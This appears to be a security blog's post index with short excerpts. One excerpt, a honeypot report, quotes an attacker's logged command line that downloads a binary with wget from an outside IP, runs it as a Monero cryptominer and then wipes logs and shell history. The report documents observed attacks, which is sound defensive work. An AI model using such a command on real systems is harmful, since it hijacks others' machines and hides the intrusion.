Never Trust Express

Apr 3, 2019 - 5 minutes
Some Background

Nowadays, a lot of people are leaning towards replacing the typical LAMP/LEMP stack with something more modern. Particularly, many people are leaning towards adopting Node.js. While I love that people are adopting new technology and moving away from shudders PHP, there is reasonable skepticism when choosing new technologies because we don’t want vulnerabilities.

So What’s The Problem With Express?

Express is a great library. It has plenty of features, it makes doing practically anything a dead simple task, all while staying reasonably simplistic in design. Read more ...

More Posts Soon?

Nov 27, 2018 - 1 minutes
So, I’ve been gone a while. I haven’t posted here in ~2 months since I did my first writeup, but I’ve been doing some reverse engineering work lately and have lots of neat finds to share (particularly related to fun MMO hacking). Stay tuned! Read more ...

Scanning for Scanners Update

Oct 8, 2018 - 2 minutes
It seems overnight I have gotten two honeypot bites, both from SMA (suckmyass) variants that I expected to be dead. Let’s see what they did, shall we?

138.36.██.██ connects with SSH-2.0-PuTTY_Release_0.70, user SSH2 and password Hacked12123.

    ls
    ls -a
    uname -a
    cat /proc/cpuinfo
    wget http://167.88.███.██/m -O - > /etc/.0; chmod 777 /etc/.0; /etc/.0 -u 42bWPQ... -o pool.monero.hashvault.pro:5555 -p x -k -a cryptonight -B --donate-level=1 --max-cpu-usage=98; rm -rf nohup.out /var/log/lastlog; history -c

*I truncated that monero address, since it serves no purpose but to take up space. Read more ...